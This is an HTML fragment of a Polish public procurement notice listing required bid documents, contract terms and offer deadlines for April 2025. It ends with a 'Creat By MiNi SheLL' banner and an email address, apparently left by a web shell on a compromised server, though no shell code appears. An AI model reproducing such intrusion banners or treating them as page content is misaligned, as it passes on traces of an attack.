z<br/>innych dokumentów złożonych wraz z ofertą. Treść pełnomocnictwa<br/>musi jednoznacznie określać czynności, co do wykonywania których<br/>pełnomocnik jest upoważniony;<br/>11.2.4. Zobowiązanie podmiotu udostępniającego zasoby do oddania<br/>wykonawcy do dyspozycji niezbędnych zasobów na potrzeby realizacji<br/>zamówienia lub inny podmiotowy środek dowodowy – jeżeli wykonawca w celu potwierdzenia spełniania warunków udziału w postępowaniu, o których mowa w pkt 7.1.8, polega na zdolności lub sytuacji podmiotu udostępniającego zasoby na zasadach określonych w art. 118 ust. 1 i 2 ustawy;<br/>11.2.5. Pełnomocnictwo do reprezentowania wykonawców w<br/>postępowaniu albo do reprezentowania w postępowaniu i zawarcia<br/>umowy w sprawie zamówienia – w przypadku wykonawców<br/>wspólnie ubiegających się o udzielenie zamówienia;<br/>11.2.6. Oświadczenie, z którego wynika, które usługi wykonają<br/>poszczególni wykonawcy - w przypadku wykonawców wspólnie<br/>ubiegających się o udzielenie zamówienia (wzór oświadczenia stanowi<br/>Załącznik nr 7 do SWZ);<br/>11.2.7. Wyjaśnienia uzasadniające zastrzeżenie tajemnicy<br/>przedsiębiorstwa (jeżeli dotyczy).<br/>11.2.8. Wykaz osób, skierowanych przez Wykonawcę do realizacji<br/>zamówienia, wraz z informacjami na temat ich kwalifikacji<br/>zawodowych, doświadczenia zawodowego, wykształcenia a także<br/>zakresu wykonywanych przez nie czynności wraz informacją o<br/>podstawie do dysponowania tymi osobami. Wykaz sporządzony<br/>według wzoru stanowiącego Załącznik nr 9 do SWZ.<br/>Zamawiający zgodnie z art. 274 ust. 2 ustawy PZP w celu<br/>zapewnienia odpowiedniego przebiegu postępowania o<br/>udzielenie zamówienia, żąda dołączenia do oferty podmiotowego<br/>środka dowodowego - wykazu osób stanowiącego Załącznik nr 9<br/>do SWZ, aktualnego na dzień jego złożenia. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Rodzaj i zakres zmian umowy oraz warunków ich wprowadzenia jest określony w Projektowanych postanowieniach umowy<br/>(załącznik nr 2 do SWZ). <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2025-04-18 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://ezamowienia.gov.pl</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2025-04-18 11:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2025-05-17</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com